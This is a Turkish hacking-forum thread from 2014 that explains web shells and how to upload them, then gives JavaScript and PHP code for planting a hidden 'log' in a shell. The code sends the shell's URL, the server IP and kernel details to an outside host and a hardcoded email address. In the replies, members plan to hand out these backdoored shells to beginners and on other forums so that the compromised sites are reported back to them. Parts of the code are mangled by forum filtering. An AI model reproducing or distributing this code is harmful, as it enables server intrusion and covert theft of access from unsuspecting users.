Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Shele log koyma
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı: 420
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #1
Shele log koyma
30.07.2014 18:34
ALINTIDIR !


Selamun aleyküm



Bugün Shell Nedir Shell Log Çeşitleri Ve Yeni Yöntemi Göstereceğim

Öncelikle Bu konuyu açma Sebebim Bu durumdan Nasıl Korunmanız Gerektiğidir..

..
Shell Nedir
Shell sunucuya Yüklediğimiz Taktirde Belirli yetkiler veren Scripttir.
Shell Bazen Admin Yetkilerini Kullanırken Bazen Tam Yetki Yani Host Yetkisi Olur

Permleri (Persmissionları) Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri
Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. İzinleri Kapalı Bir Sunucuda İse Bu
Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.

Birde shellde bypass Config çekme Yontemleri vardır. Bunları Az araştırarak bula bilrisiniz
Bu genelde Linux Serverlerde Olur Windows Serverlerde genelde Tüm Permler açıktır.
Konumuz bu olmadıgı için Üstten Alıyorum Belki İleriki Zamnlarda Daha detaylı anlata
bilirim..
shell Nasıl Atılır?

Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz

* SQL Injection Açıklarından Faydalanabiliriz

* Exploits Kullanarak Yükleme Yapabiliriz

* Upload Açıklarından Faydalanabiliriz

* Logger vb Spy Yazılımlardan Faydalanabiliriz

* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz

* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz

Bu Yontemlerle shell Yukleye Biliriz Nasıl Yüklendiği Forumda Var .

Shell Çeşitleri ise “php” “Asp” “Aspx” ve “Cgi” Shell vardır .

Shell ne oldugunu üstten Değindik. Belki ilerleten sürelerde daha detaylı anlata biliriz.

Log Nedir

Log Türkçesi Günlük, işlem/olay listesi, Günlük Tutmak
Anlamındadır .
Tamda Türkçesi Gibidir Kayıt tutar Ve listeler.

Shellde log ise Shell Attıgımız sunucuda Linki Sheli veipmizi Html dosyasına veya Mailimize Gelmesini Saglıyacaktır.
Şimdi bende Bunların Yontemlerini Anlatacağım..

Shell’e Log koymanın 2 Farklı Yontemi Vardır..
Biri Java script Diğeri İse Mail Log Java İle yapılanı hemen hemen Hepimiz Biliyoruzdur..
Ben yinede JavaScrpt Logu anlatacağım ancak gorsellerle değil.

JavaScrpt shell Atma 3 Aşamadan Yapılır.

.js Dosyası Oluşturma
Js yonledireceği php Dosyası
Ve kayırların Tutulacağı txt Dosyası veya html

Js Dosyası Oluşturma

Cw.js diye bir dosya Oluşturarak Java Script Kodumuzu yazıyoruz.

PHP Kod:
Kod:
a=new/**/Image();a.Yasak Kelime#146;http://cw.com/ray.php?a=’+escape(location.href);[/FOTN] 


Şeklinde yazıp Kayıt Ediyoruz..

İkinci Olarak php Dosyamızı Oluşturuyoruz ve ismini Ray.php Şeklinde Dosya açıyoruz.
Bu bunun içine aşağıdai kodları yapıştırıyoruz


PHP Kod:
<?php 

$ip 
$_SERVER[’REMOTE_ADDR’]; 
$tarih date(’d.m.Y H:i:s’); 
$browser getenv(’HTTP_USER_AGENT’); 
$referans $_SERVER[’HTTP_REFERER’]; 
$kayit fopen("cw.txt""a"); 
fputs($kayit"IP: $ip - TARIH: $tarih - Link: $referans - BROWSER: $browser \\\\n "); 
fclose($kayit); 

?>


Son Olarak

Ray.php yazmış Oldğumuz Cyberizm.txt oluşturuyoruz içi boş olarka atıyoruz Shell buraya gelecektir

Tamdır şimdi sistem hazır bundan sonraise
3 dosyayı FTP’ye Atıyoruz
Sonra loglamak isteğimiz php dosyasına aşığıdaki Kodu katıyoruz ..

PHP Kod:
<SCRIPT SRC=http://sitenizinadı.com/log.js></SCRIPT> 







Şeklinde Gelecektir



Bu kodu ekledikden sonra koddaki adresi kendinize göre düzenleyin yane log.js yi nereye attıysanız onun adresini verin yoksa çalışmaz.

Peki Bundan Nasıl Koruna Biliriz
Shelimize Girdiğimiz zaman Ctrl+f Yaparak “js></SCRIPT>” Aratarak Eğer varsa linkteki Her hangi bir yeri bozarak logu bozmuş olursunuz.


Java Logu Bitirdik şimdi Sıra Mail Log

Mail Log

Evet Arkdaslar Pek Kimsenin Bilmediği Mail Loga Geldik Mail Log serverin Mail Sistemini Kullanarak Belirlediğimiz bilgileri Bize yollicaktır . Şuanda Az Bilinen Bir yontem .
Bizimki Bize
İp:
Time:
Link
Yollicaktır Siz Geliştire bilirsiniz
En basidinden
>’.php_uname().’<
Yazarak Kernel bilgisine Server bilgisine Ulaşabilirsiniz.

Kullanımı Çok basittirMantıgını anlattım.
Yapmamız gerek Tek şey uygun bir tag arasına koymak
En uygunu
<?php Hemen Altındaki Satıra Kopyalamanız yeterlidir.
Kodumuz

PHP Kod:
if ($admin[’check’]) {
    if (
$doing == ’login’) {
        if (
$admin[’pass’] == $password) {
            
scookie(’kyobin’$password);
            
$time_shell     "" date("d/m/Y - H:i:s") . "";
            
$ip_remote      $_SERVER["REMOTE_ADDR"];
            
$from_shellcode ’shell@’ gethostbyname($_SERVER[’SERVER_NAME’]) . ’’;
            
$to_email       ’yusufk02400@gmail.com’;
               
//
            
$server_mail    "" gethostbyname($_SERVER[’SERVER_NAME’]) . " - " $_SERVER[’HTTP_HOST’] . "";
            
$linkcr        "Link: " $_SERVER[’SERVER_NAME’] . "" $_SERVER[’REQUEST_URI’] . " - IP Excuting: $ip_remote - Time: $time_shell";
            
$header        "From: $from_shellcode
Reply-to: 
$from_shellcode"







Ve Upload Ediyoruz gerekli Tek şey Upload ettiğimiz Dosyaya Girmektir
Ben upload ettim
Basit bir uplaod Scripti Üzerinde yapıyorum ben







Evet şimdi Belirlediğim MaiL’e bakıyorum Bazen 2-3 dk geçikmeli gelebilir ama mutlaka gelecektir.

Şimdi Bakalım Gelmişmi..







Bundan Korunma yolu İse Yine aynı mantık ctrl+f Yaparak to_email Ogesini Arayaral Mail’i bozuyoruz yani bir hecesini silemiz yeterlidir.


Evet arkdaslar gordugunuz gibi geldi Kod geliştirele bilir


SeLametle
(Bu konu en son: 30.07.2014 Tarihinde, Saat: 18:56 düzenlenmiştir. Düzenleyen: Stallk3r.)

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
Rep Verenler: '[[email protected]]
'[[email protected]]
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 19 / 249
Deneyim: 97 / 100
Rep Sayısı: 24
Mesaj Sayısı: 142
Üyelik Tarihi: 24.01.2014
      
Yorum: #2
Cvp: Shele log koyma
30.07.2014 18:36
Eline Sağlık Kardeşim Smile
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı:
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #3
Cvp: Shele log koyma
30.07.2014 18:37
Diline sağlık kardeşim mutlaka oku Exciting baştan

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
'[[email protected]]
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 19 / 249
Deneyim: 97 / 100
Rep Sayısı:
Mesaj Sayısı: 142
Üyelik Tarihi: 24.01.2014
      
Yorum: #4
RE: Shele log koyma
30.07.2014 18:39
(30.07.2014 18:37)BruteForce Nickli Kullanıcıdan Alıntı:  Diline sağlık kardeşim mutlaka oku Exciting baştan
Shell Kodlayacağım Zaman Cyberizm'de Yönetime Falan Temizini Atarım Diğer Her Tarafa Bunu Okuyup Loglu Dağıtırım Exciting Birde Shell loglarım normal shelleri öğrenmeye gelenlere veririm sonra sw'ler kucakta Exciting Exciting Exciting
Eline Sağlık
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı:
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #5
Cvp: Shele log koyma
30.07.2014 18:41
Angel.php örneğini veriyim sana angel php içine log koyarak cyberizmde hiç birzaman yapma diğer hack sitelerinde paylaşarak hacklediği sitelerin direk mail yoluyola shell yolu vericektir kardeşim Exciting

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
Rep Verenler: '[[email protected]]



1 Ziyaretçi